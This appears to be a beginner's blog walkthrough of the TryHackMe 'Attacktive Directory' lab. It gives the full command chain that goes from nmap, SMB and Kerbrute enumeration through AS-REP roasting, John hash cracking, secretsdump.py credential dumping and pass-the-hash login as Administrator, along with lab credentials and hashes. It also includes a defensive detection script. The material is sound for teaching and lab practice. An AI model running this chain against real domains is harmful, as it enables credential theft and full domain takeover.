#beginners #activedirectory #AD #enumeration #exploitation
As you may be aware, the latest buzz (well, for a number of years actually) has been about AD.
Active Directory enumeration and exploitation is a fantastic skill set to possess.
Below are detailed steps for enumerating AD and then exploiting it. Just always remember: enum, enum, enum at every stage. There is a quick guide section at the bottom of the page if you want quick notes.
Let's begin
1. NMAP scan
We are going to start with an nmap scan:
nmap 10.10.61.211 -sV -Pn -A
Let's go through the results:
- Port 53 (DNS) is open; this is very important for AD setups.
- Microsoft IIS is running, so no doubt a server with higher privileges and possibly a config file somewhere with credentials.
- Port 88 (Kerberos) is open, which means we can enumerate valid users.
- Port 389 (LDAP) is open; we can potentially run LDAP tools against it.
- Ports 135, 139 and 445 are open: RPC and SMB ports, perfect for enumerating information with enum4linux, smbclient, smbmap and more.
- Very importantly, ports 3389 and 5985 are also open. This means RDP is potentially accessible (if users are members of the relevant group) and we can run tools like evil-winrm against port 5985 (WinRM).
We have also gathered the following information:
- we know the domain: spookysec.local
- so let's first add this to our /etc/hosts
- it is important to add it to /etc/hosts, as otherwise you will not get the intended results
2. Edit /etc/hosts
sudo nano /etc/hosts
3. Enumeration
Our next step is to gather as much information as possible. Ideally we are looking for credentials (a long shot, I know), but finding usernames (including the username format) is very achievable.
3a. Website Enumeration
Steps:
- check out the website and snoop around
- check out the source code; sometimes credentials are left there in error
- run a directory scan; you may need to run it with different wordlists, and may also need to specify extensions, i.e. php, txt etc.
3b. SMB/RPC Enumeration
smbmap:
smbmap -H 10.10.61.211
smbclient:
smbclient -L \\\\10.10.61.211\\
enum4linux:
enum4linux 10.10.61.211
- the information here is quite useful, so make a note of it.
4. Enum users / password spray
At this stage one of two things will happen:
- you either have some usernames (found from earlier stages)
- or you will be using a username list to find them
As you can imagine, the latter is not ideal, as lockout policies may stop you in your tracks.
Nevertheless, let's progress; for this I am using a modified list provided by THM.
The tool we will use is called Kerbrute.
Just to note: you can also use crackmapexec and other tools for this stage.
4a. Kerbrute
./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.61.211 /tmp/userlist.txt
What's going on with the command:
- we need to specify the userenum mode
- -d for the domain
- --dc for the domain controller's IP address (you can also use the domain name here)
- and finally the username list
A few things should immediately jump out at us:
- 1. svc-admin (and the dumped hash)
- 2. the backup username
- we can attempt to crack this hash using John; sadly I had no luck
- the main thing is that we have some valid usernames, including the actual naming format used.
5. Next stage: abuse a feature within Kerberos
Now that we have some valid usernames, we could password spray using crackmapexec or a similar tool, or, better, use a script from Impacket called GetNPUsers.py.
Why: (source TryHackMe.com)
- we want to abuse a feature within Kerberos using an attack method called ASREPRoasting
What is that: (source TryHackMe.com)
- it applies when a user account has the “Does not require Pre-Authentication” setting enabled
- meaning that the account does not need to provide valid identification before requesting a Kerberos ticket for that user account. As a result, we can get a crackable hash for the user!
As it stands we have svc-admin, backup and other usernames.
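As an added defender-side example (not part of the original walkthrough or of the TryHackMe room), the following Python checks the two things that matter here: which accounts carry the userAccountControl bit behind “Does not require Pre-Authentication”, and which Kerberos TGT request events (Windows Security event 4768) show the no-pre-authentication, RC4-encrypted pattern that an AS-REP roasting request leaves on the domain controller. The user records and events are constructed sample data.

```python
"""Defender-side checks for the AS-REP roasting exposure described above (added
example, not from the original walkthrough; SAMPLE_USERS/SAMPLE_EVENTS are constructed)."""

# userAccountControl bit "Do not require Kerberos preauthentication" (ADS_UF_DONT_REQUIRE_PREAUTH)
DONT_REQ_PREAUTH = 0x400000
# Windows Security event id for "A Kerberos authentication ticket (TGT) was requested"
EVENT_TGT_REQUEST = 4768
# Kerberos pre-authentication type 0 = no pre-auth data; type 2 = encrypted timestamp
PREAUTH_NONE = 0
# Ticket encryption type 0x17 = RC4-HMAC, the etype behind a $krb5asrep$23$ hash
ETYPE_RC4_HMAC = 0x17

def find_preauth_disabled(users):
    """Return sorted sAMAccountNames whose userAccountControl has the pre-auth bit set."""
    return sorted(u["sAMAccountName"] for u in users
                  if u["userAccountControl"] & DONT_REQ_PREAUTH)

def suspicious_tgt_requests(events):
    """Return (account, client ip) for 4768 events with no pre-auth and an RC4 ticket,
    the pattern a GetNPUsers.py-style request against an exempt account leaves behind."""
    hits = []
    for ev in events:
        if ev["EventID"] != EVENT_TGT_REQUEST:
            continue  # 4769 (service ticket) and other events are not AS-REQs
        if ev["PreAuthType"] == PREAUTH_NONE and ev["TicketEncryptionType"] == ETYPE_RC4_HMAC:
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits

# Constructed records: NORMAL_ACCOUNT (0x200) | DONT_EXPIRE_PASSWORD (0x10000); flag set on one.
SAMPLE_USERS = [
    {"sAMAccountName": "svc-admin", "userAccountControl": 0x10200 | DONT_REQ_PREAUTH},
    {"sAMAccountName": "backup", "userAccountControl": 0x10200},
    {"sAMAccountName": "james", "userAccountControl": 0x200},
]
# Constructed events; client addresses are placeholders, not captured traffic.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-admin", "PreAuthType": 0,
     "TicketEncryptionType": 0x17, "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "backup", "PreAuthType": 2,
     "TicketEncryptionType": 0x12, "IpAddress": "::ffff:10.10.61.212"},
    {"EventID": 4769, "TargetUserName": "james", "IpAddress": "::ffff:10.10.61.213"},
]

if __name__ == "__main__":
    print("pre-auth disabled:", find_preauth_disabled(SAMPLE_USERS))
    print("AS-REP roast candidates:", suspicious_tgt_requests(SAMPLE_EVENTS))
```

Clearing the flag on the accounts the first check reports, and alerting on the second pattern, closes the exposure this section exploits.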
6. GetNPUsers.py
python3 GetNPUsers.py spookysec.local/ -dc-ip 10.10.61.211 -usersfile /tmp/users_list_example.txt -format john -outputfile /tmp/crackme.txt
python3 GetNPUsers.py spookysec.local/svc-admin -outputfile crackme.txt
- pay attention to the format of the command, as it can be funny and not run as intended. I struggled with using -dc with a hostname.
- ok, that is fine; it means svc-admin does not require pre-authentication, so let's check out the output file
- let's use john to crack this hash
7. JtR
john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt
- brilliant, we have a password!
8. Enumeration! (again)
Remember what I said at the start: any time we get valid credentials we need to go back to square one.
Square one is:
- smbclient
- smbmap
- RDP / WinRM attempts
- login portals? Let's try these credentials
smbmap:
smbmap -u svc-admin -p management2005 -H 10.10.61.211
smbclient:
smbclient -L \\\\10.10.61.211\\ --user svc-admin
smbclient -L spookysec.local --user svc-admin
Instantly, the backup share should stick out like a sore thumb.
9. Enumerating further, for some credentials
Let's check it out; again you can use smbmap, smbclient and even crackmapexec (CME).
If you intend to use smbclient, you need to remove the -L (as that is for listing); see the syntax below:
smbclient \\\\spookysec.local\\backup --user svc-admin
smbclient \\\\10.10.61.211\\backup --user svc-admin
- if you encounter an error like “Not enough '\' characters in service”, you haven't put in enough backslashes. It should be as shown above.
We find the following in the backup share:
It looks like it is base64 encoded, so let's decode it:
echo YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw | base64 -d
It looks like we have some credentials for the user backup.
10. Privileged
It is safe to presume that the user backup will have privileged access; I mean, why else would it be called backup? It must be backing up important stuff, surely.
Since we have the credentials, we can use a tool called Secretsdump.py (from Impacket) to access the hashes of the administrator account (or similar), which has full rights over everything in the domain.
10a. Secretsdump.py
Secretsdump.py is a script used to extract credentials and secrets from a system.
sudo python3 secretsdump.py -just-dc backup@spookysec.local
- provide the password when prompted (note: you need to run it with sudo)
WOOHOO!!
We have the hash. Just so you are aware, the hash we require is the second part, as shown below (highlighted in burgundy).
What can we do with this:
- we will do something called Pass the Hash (PtH), whereby we pass this hash directly to the tool instead of a password to gain access to the system, as you will see next
11. Pass the Hash (PtH)
How does it all work? Let's see, using Evil-WinRM:
evil-winrm -i 10.10.61.211 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
- notice we have not provided a password, but instead the hash of the Administrator user
And there we have it! We are now Administrator!
A quick guide:
- nmap scan: get domain info etc.
- add the domain to /etc/hosts
- start enumeration: website, SMB, RPC, LDAP, DNS
- validate usernames with kerbrute or a password spray
- with valid names, next ASREPRoast using the GetNPUsers.py script
- use JtR to crack the hash you find
- back to square one: enumerate, using the credentials you have to log in via smbclient, smbmap etc. and inspect the shares
- can you find any useful credentials for privileged accounts? If so,
- use secretsdump.py with the new set of credentials, as a privileged user will have access to the hashes for the Administrator account
- using the hash from the Administrator account, log in via RDP or evil-winrm using Pass the Hash
Sources and credits:
Huge thanks to TryHackMe for the brilliant Attacktive Directory room.